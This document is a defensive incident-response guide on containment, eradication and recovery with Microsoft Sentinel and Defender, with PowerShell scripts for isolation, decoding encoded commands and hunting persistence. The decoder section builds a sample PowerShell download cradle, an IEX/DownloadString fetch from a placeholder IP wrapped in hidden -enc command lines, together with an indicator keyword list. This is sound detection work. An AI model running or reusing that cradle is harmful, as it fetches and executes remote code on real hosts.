Containment, Eradication & Recovery in Incident Response

Overview

The Containment, Eradication & Recovery phase is the third of the four incident response phases defined in NIST SP 800-61 (Preparation; Detection and Analysis; Containment, Eradication and Recovery; Post-Incident Activity). NIST SP 800-171 R2 (requirement 3.6.1) and CMMC 2.0 require an incident-handling capability that covers these activities. This phase focuses on limiting the impact of an incident, removing the threat, and restoring systems to a secure operational state.

Objectives:

  • Contain the incident to prevent further damage.
  • Eradicate the root cause and any malicious artifacts.
  • Recover affected systems and resume normal operations.
  • Implement security measures to prevent recurrence.

Containment

Containment aims to stop an attack from spreading while preserving evidence and, as far as possible, system availability. The strategy chosen (network isolation, shutdown, or monitored "watch and wait") depends on the potential damage, the evidence that must be preserved, and the business impact of taking the system offline.

Containment, Eradication and Recovery Action Items (adapted from the NIST SP 800-61 incident handling checklist)

  1. Acquire, preserve, secure, and document evidence
  2. Contain the incident
  3. Eradicate the incident
    3.1 Identify and mitigate all vulnerabilities that were exploited
    3.2 Remove malware, inappropriate materials, and other components
    3.3 If more affected hosts are discovered (e.g., new malware infections), repeat the Detection and Analysis steps to identify all other affected hosts, then contain (step 2) and eradicate (step 3) the incident for them
  4. Recover from the incident
    4.1 Return affected systems to an operationally ready state
    4.2 Confirm that the affected systems are functioning normally
    4.3 If necessary, implement additional monitoring to look for future related activity

Types of Containment:

  1. Short-Term Containment (Immediate Actions)
    • Work with OSC Compliance Managers to identify and isolate affected devices from the network.
    • Disable compromised accounts.
  2. Long-Term Containment (Sustained Actions)
    • Apply patches and security updates.
    • Implement enhanced monitoring.
    • Restrict elevated access through Privileged Identity Management (PIM).

Technical Steps for Containment

Microsoft Sentinel Response Actions

  1. Navigate to Microsoft Sentinel > Incidents.
  2. Select the active incident and review related entities (accounts, hosts, IP addresses, files).
  3. Run a response playbook from the incident (Actions > Run playbook). Sentinel itself does not contain anything; the playbook (a Logic App) calls Defender for Endpoint to isolate the device or Microsoft Entra ID to disable the user and revoke sessions.

Microsoft Defender for Endpoint

  1. Navigate to the Microsoft Defender portal (security.microsoft.com) > Incidents & alerts.
  2. Open the incident and select the affected device from its Assets tab.
  3. Execute the following actions:
    • Isolate device from the network.
    • Initiate live response session to investigate further.
    • Restrict application execution to prevent malware propagation.

Manual Action Methods for Containing Common Incidents

Laptop infected with malware
  • Disconnect the laptop from the network
  • Change the end user's passwords from another, clean machine (never from the infected one)
  • Provide a spare workstation to the employee
  • Remove malware from the laptop
Virtual machine infected with malware
  • Disconnect the VM from the network
  • Save the VM state (snapshot, including memory) as evidence before shutting it down
  • Shut down the VM
  • Stand up a new VM from the last known good backup
Compromised account
  • Reset the account password
  • Force the account to log off from active sessions (revoke refresh tokens)
  • Reset passwords for recovery accounts
  • Review account group memberships
  • Review account privileges and registered MFA methods
  • Monitor account activity
Denial of service attack
  • Block the source IP address(es); for distributed or spoofed-source attacks, engage the upstream provider or DDoS protection service, since per-address blocking does not scale
Phishing attack
  • Block the sender email address and domain
  • Reset credentials of any user who submitted them to the phishing page
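
The "Compromised account" and infected-device rows above, automated as an added example (this is not code from the original page or from Microsoft). It assumes the incident has yielded the user's UPN and the Defender for Endpoint machine ID, and that an app registration with the Machine.Isolate and Machine.RestrictExecution application permissions exists for the Defender for Endpoint API; the parameter names, scopes and output file name are assumptions.

```powershell
#Requires -Version 7
#Requires -Modules Microsoft.Graph.Users, Microsoft.Graph.Users.Actions
# Added example, not code from the original page: contain one compromised
# user and the device they were using. Assumed inputs: the MDE device ID and
# the user's UPN from the incident, plus an app registration holding the
# Machine.Isolate and Machine.RestrictExecution permissions. The operator
# needs an Entra role that may reset passwords (e.g. User Administrator).
param(
    [Parameter(Mandatory)] [string] $UserPrincipalName,
    [Parameter(Mandatory)] [string] $DeviceId,      # MDE machine ID, not the Entra device ID
    [Parameter(Mandatory)] [string] $IncidentId,    # recorded in every action comment
    [Parameter(Mandatory)] [string] $TenantId,
    [Parameter(Mandatory)] [string] $ClientId,
    [Parameter(Mandatory)] [securestring] $ClientSecret,
    [ValidateSet('Full', 'Selective')] [string] $IsolationType = 'Full'
)
$comment = "Containment for incident $IncidentId"

# 1. Isolate the endpoint first, so the attacker cannot react on the host to
#    the identity changes. Full isolation leaves only the Defender sensor
#    channel open; Selective keeps Outlook/Teams reachable for the user.
$token = (Invoke-RestMethod -Method Post `
    -Uri "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token" `
    -Body @{
        grant_type    = 'client_credentials'
        client_id     = $ClientId
        client_secret = ConvertFrom-SecureString $ClientSecret -AsPlainText
        scope         = 'https://api.securitycenter.microsoft.com/.default'
    }).access_token
$mde = @{
    Method  = 'Post'
    Headers = @{ Authorization = "Bearer $token"; 'Content-Type' = 'application/json' }
}
$isolate = Invoke-RestMethod @mde `
    -Uri "https://api.securitycenter.microsoft.com/api/machines/$DeviceId/isolate" `
    -Body (@{ Comment = $comment; IsolationType = $IsolationType } | ConvertTo-Json)
# Also block anything not signed by Microsoft from running until the
# investigation is done (the "restrict app execution" action in the portal).
$restrict = Invoke-RestMethod @mde `
    -Uri "https://api.securitycenter.microsoft.com/api/machines/$DeviceId/restrictCodeExecution" `
    -Body (@{ Comment = $comment } | ConvertTo-Json)

# 2. Contain the identity: disable, reset the password, revoke refresh tokens.
#    Revocation alone is not enough: access tokens already issued stay valid
#    until they expire (up to an hour), which is why the device is isolated too.
$scopes = @('User.ReadWrite.All', 'User-PasswordProfile.ReadWrite.All',
            'Directory.Read.All', 'UserAuthenticationMethod.Read.All')
Connect-MgGraph -NoWelcome -Scopes $scopes
$user = Get-MgUser -UserId $UserPrincipalName -Property Id, UserPrincipalName
Update-MgUser -UserId $user.Id -AccountEnabled:$false
# 24 random printable characters; nobody learns this value, the help desk
# issues a fresh password once the account is cleared for use again.
$newPassword = -join ((33..126) | Get-Random -Count 24 | ForEach-Object { [char]$_ })
Update-MgUser -UserId $user.Id -PasswordProfile @{
    Password                      = $newPassword
    ForceChangePasswordNextSignIn = $true
}
Revoke-MgUserSignInSession -UserId $user.Id | Out-Null

# 3. Collect what the privilege review needs: group/role memberships and the
#    registered MFA methods (an attacker-added authenticator shows up here).
$odataType = @{ n = 'Type'; e = { $_.AdditionalProperties['@odata.type'] } }
$report = [pscustomobject]@{
    User            = $user.UserPrincipalName
    IsolationAction = $isolate.id      # MachineAction IDs for the incident record
    RestrictAction  = $restrict.id
    Memberships     = Get-MgUserMemberOf -UserId $user.Id -All |
        Select-Object Id, $odataType, @{ n = 'Name'; e = { $_.AdditionalProperties['displayName'] } }
    AuthMethods     = Get-MgUserAuthenticationMethod -UserId $user.Id |
        Select-Object Id, $odataType
}
$report | ConvertTo-Json -Depth 4 | Set-Content "incident-$IncidentId-containment.json"
$report
```

The order matters: the device is isolated before the account is touched, and the password reset, disable and session revocation are done together because any one of them alone leaves a window (a still-valid access token, a cached credential on the host) that the attacker can use. The JSON report is the input to the group membership and privilege review listed in the table.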

Eradication

Once the incident is contained, the next step is to remove the threat completely.

Eradication Practices:

  • Remove malware, backdoors, and unauthorized accounts.
  • Conduct forensic analysis to determine attack vectors.
  • Validate system integrity and remove compromised credentials.

Technical Steps for Eradication

Using Microsoft Defender for Endpoint

  1. Open the Microsoft Defender portal and go to the affected device page.
  2. Check Threat Analytics to see which known threat the detected artifacts belong to and what remediation it recommends.
  3. Remove the malicious artifacts:
    • Use Stop and Quarantine File on the file page: it kills the running process and quarantines the file on every onboarded device where it is found.
    • In a live response session, use remediate <path> to remove files, services, scheduled tasks and registry entries the attacker used for persistence, then run a full antivirus scan.
    • Revoke the compromised user's sessions in Microsoft Entra ID (user > Revoke sessions) so stolen refresh tokens stop working. This is an identity action, not an endpoint one, and it does not invalidate access tokens that are already issued; those expire on their own.

Using Microsoft Sentinel for Log Correlation

  1. Run Kusto Query Language (KQL) searches to identify malicious activity. The query below finds encoded PowerShell in Windows process-creation events. It only works if the "Include command line in process creation events" audit policy is enabled on the hosts; otherwise the CommandLine column of event 4688 is empty. A plain contains "powershell -encoded" check misses most real cases, because the logged command line starts with the full path to powershell.exe and the flag is usually abbreviated (-e, -ec, -enc).
    SecurityEvent
    | where EventID == 4688
    | where Process in~ ("powershell.exe", "pwsh.exe")
    // powershell.exe accepts -e, -ec, -enc, -encoded... as short forms of -EncodedCommand
    | where CommandLine matches regex @"(?i)\s-e(c|nc|ncoded\w*)?\s+[A-Za-z0-9+/=]{16,}"
    | project TimeGenerated, Computer, Account, ParentProcessName, CommandLine
    
  2. Cross-check the accounts and hosts returned against the incident's entities and force password resets for every affected account.
  3. Review Microsoft Entra ID Sign-in Logs for unusual authentication attempts (new locations, legacy protocols, MFA failures followed by a success).
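
Finding an encoded command is only half the job; the analyst needs to see what it ran. The following added example (not code from the original page) decodes the payloads that the query above returns, accepting every short form of -EncodedCommand, and flags common download-cradle indicators. The sample command lines are constructed here for the demonstration; the Sentinel variant assumes the Az.OperationalInsights module and a Log Analytics workspace ID.

```powershell
#Requires -Version 7
# Added example, not code from the original page. Decodes -EncodedCommand
# payloads (UTF-16LE base64) from 4688 command lines and flags indicators.

function ConvertFrom-EncodedPowerShellCommand {
    param([Parameter(Mandatory, ValueFromPipeline)] [string] $CommandLine)
    process {
        # powershell.exe accepts -e, -ec, -enc, -encoded and -EncodedCommand;
        # the \s+ after the flag keeps -ep / -ExecutionPolicy from matching.
        if ($CommandLine -match '\s-e(c|nc|ncoded\w*)?\s+(?<b64>[A-Za-z0-9+/=]{16,})') {
            try {
                # The payload is UTF-16LE, not UTF-8: decoding as UTF-8 gives
                # every other byte as NUL and hides the real script.
                $decoded = [Text.Encoding]::Unicode.GetString(
                    [Convert]::FromBase64String($Matches.b64))
            } catch { return $null }   # truncated or not actually base64

            $indicators = 'IEX', 'Invoke-Expression', 'DownloadString', 'DownloadFile',
                          'Net.WebClient', 'Invoke-WebRequest', 'FromBase64String',
                          '-nop', 'bypass', 'hidden', 'Add-MpPreference', 'reg add'
            $hits = @($indicators | Where-Object {
                $decoded -match [regex]::Escape($_) -or $CommandLine -match [regex]::Escape($_) })
            [pscustomobject]@{
                Decoded    = $decoded
                Indicators = $hits
                Suspicious = $hits.Count -gt 0
            }
        } else {
            return $null
        }
    }
}

# Same decoding over rows returned from Sentinel (not run in this example).
function Get-EncodedCommandsFromSentinel {
    param([Parameter(Mandatory)] [string] $WorkspaceId,
          [timespan] $Lookback = [timespan]::FromDays(7))
    $query = @'
SecurityEvent
| where EventID == 4688 and Process in~ ("powershell.exe", "pwsh.exe")
| where CommandLine matches regex @"(?i)\s-e(c|nc|ncoded\w*)?\s+[A-Za-z0-9+/=]{16,}"
| project TimeGenerated, Computer, Account, ParentProcessName, CommandLine
'@
    $rows = (Invoke-AzOperationalInsightsQuery -WorkspaceId $WorkspaceId `
                -Query $query -Timespan $Lookback).Results
    foreach ($row in $rows) {
        $r = $row.CommandLine | ConvertFrom-EncodedPowerShellCommand
        [pscustomobject]@{
            Time = $row.TimeGenerated; Computer = $row.Computer; Account = $row.Account
            Parent = $row.ParentProcessName; Suspicious = $r.Suspicious; Decoded = $r.Decoded
        }
    }
}

# Constructed samples: a benign admin script, a typical download cradle
# (198.51.100.7 is documentation address space), and the shortest flag form.
$cradle  = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")'
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$samples = @(
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc $b64",
    "powershell.exe -e $b64"
)
foreach ($cmd in $samples) {
    $r = $cmd | ConvertFrom-EncodedPowerShellCommand
    if ($null -eq $r) { "no encoded command : $cmd" }
    else { "suspicious=$($r.Suspicious) [$($r.Indicators -join ',')] : $($r.Decoded)" }
}
```

The first sample is rejected even though it contains "-E", which is the point of requiring whitespace after the flag. The other two decode to the same cradle and are flagged on IEX and DownloadString; the second also trips on -nop and hidden from the outer command line, which is why both the decoded script and the raw command line are checked.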

Recovery

After eradication, recovery focuses on restoring affected systems and improving security posture.

Key Recovery Activities:

  1. Wipe the device back to factory settings (all local data is removed) rather than trying to clean it in place.
    • Restore user data to the device from OneDrive.
    • If files were encrypted or tampered with, restore earlier valid versions from OneDrive version history.
  2. Reinforce Security Controls
    • Apply Multi-Factor Authentication (MFA).
    • Reconfigure Conditional Access Policies.
  3. Continuous Monitoring
    • Enable Defender advanced threat protection features (attack surface reduction rules, network protection, tamper protection).
    • Implement Microsoft Defender for Cloud (formerly Azure Security Center) recommendations.

Technical Steps for Recovery

Restoring Systems from Backup

  1. Validate the backup snapshot's integrity and confirm that it predates the initial compromise; restoring a backup taken after the attacker's first access reintroduces their persistence.
  2. Restore clean VMs, files, and databases.
  3. Run a full Microsoft Defender Antivirus scan and apply outstanding patches before reconnecting restored systems to the network.

Revalidating System Integrity

  1. Run a full Microsoft Defender Antivirus scan and review the device in Defender Vulnerability Management to confirm the exploited weakness is closed.
  2. Hunt for persistence (Run keys, scheduled tasks, services, WMI subscriptions, new local or cloud accounts, added MFA methods) before declaring the host clean; a penetration test validates the fix for the exploited vulnerability but cannot prove that no attacker foothold remains.
  3. Log findings in Microsoft Sentinel (incident comments and bookmarks) for future reference.
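
The persistence hunt in step 2, as an added example (not code from the original page): it inventories the locations attackers most often use on Windows and diffs the result against a baseline exported from a known-good build of the same image, so only items that need explaining are shown. The baseline file name is an assumption; run it in an elevated PowerShell on the recovered host.

```powershell
#Requires -Version 7
#Requires -RunAsAdministrator
# Added example, not code from the original page: persistence inventory and
# baseline diff for validating a recovered Windows host.

function Get-PersistenceInventory {
    $items = [System.Collections.Generic.List[object]]::new()
    $add = { param($Type, $Name, $Value)
        $items.Add([pscustomobject]@{ Type = $Type; Name = $Name; Value = [string]$Value }) }

    # Run / RunOnce keys, machine-wide and for the current user hive
    foreach ($hive in 'HKLM:', 'HKCU:') {
        foreach ($key in 'Run', 'RunOnce') {
            $path = "$hive\Software\Microsoft\Windows\CurrentVersion\$key"
            if (-not (Test-Path $path)) { continue }
            $props = Get-ItemProperty -Path $path
            foreach ($p in $props.PSObject.Properties | Where-Object Name -NotLike 'PS*') {
                & $add 'RunKey' "$path\$($p.Name)" $p.Value
            }
        }
    }
    # Scheduled tasks outside Microsoft's own task folders
    foreach ($t in Get-ScheduledTask | Where-Object TaskPath -NotLike '\Microsoft\*') {
        $actions = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        & $add 'ScheduledTask' "$($t.TaskPath)$($t.TaskName)" $actions
    }
    # Services whose image lives outside %SystemRoot% (typical for dropped binaries)
    foreach ($s in Get-CimInstance Win32_Service |
             Where-Object { $_.PathName -and $_.PathName -notmatch '\\Windows\\' }) {
        & $add 'Service' $s.Name $s.PathName
    }
    # WMI permanent event subscriptions, a fileless persistence technique
    $ns = 'root\subscription'
    foreach ($f in Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue) {
        & $add 'WmiFilter' $f.Name $f.Query
    }
    foreach ($class in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') {
        foreach ($c in Get-CimInstance -Namespace $ns -ClassName $class -ErrorAction SilentlyContinue) {
            & $add 'WmiConsumer' $c.Name ($c.CommandLineTemplate ?? $c.ScriptText)
        }
    }
    # Members of the local Administrators group (attacker-created accounts land here)
    foreach ($m in Get-LocalGroupMember -Group Administrators) {
        & $add 'LocalAdmin' $m.Name $m.PrincipalSource
    }
    return $items
}

# Diff against the baseline: only items present on this host and absent from
# the baseline are returned, and each one must be explained before the
# system is declared clean.
function Compare-PersistenceBaseline {
    param([Parameter(Mandatory)] [string] $BaselinePath)
    $baseline = Get-Content $BaselinePath -Raw | ConvertFrom-Json
    Compare-Object -ReferenceObject @($baseline) -DifferenceObject @(Get-PersistenceInventory) `
        -Property Type, Name, Value | Where-Object SideIndicator -eq '=>'
}

# Usage (baseline file name is an assumption):
#   on the golden image:   Get-PersistenceInventory | ConvertTo-Json | Set-Content baseline-gold.json
#   on the recovered host: Compare-PersistenceBaseline -BaselinePath .\baseline-gold.json | Format-Table -AutoSize
```

The diff deliberately ignores items that disappeared relative to the baseline; what matters for revalidation is anything new. A legitimate change (a newly packaged agent, for instance) will show up too and is simply confirmed against the change record, which is cheaper than missing a scheduled task that re-downloads the malware on the first reboot.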

Incident Categorization Framework

Severity Levels:

High
  • Containment: Immediate isolation, SOC notification
  • Eradication: Full forensic investigation, root cause analysis
  • Recovery: Rebuild systems, reinforce security
Medium
  • Containment: Network segmentation, user account lockdown
  • Eradication: Malware removal, identity protection
  • Recovery: System revalidation, MFA enforcement
Low
  • Containment: Log analysis, limited restrictions
  • Eradication: Endpoint scanning, security policy updates
  • Recovery: User education, review SIEM alerts

Conclusion

The Containment, Eradication & Recovery phase is crucial in limiting damage and restoring secure operations after an incident. Leveraging Microsoft Sentinel and Microsoft Defender, organizations can swiftly detect, contain, and remove threats while reinforcing cybersecurity defenses.

Next Steps:

  • Enhance automation in Microsoft Sentinel playbooks.
  • Strengthen Microsoft Defender for Endpoint threat intelligence.
  • Conduct periodic incident simulation exercises.
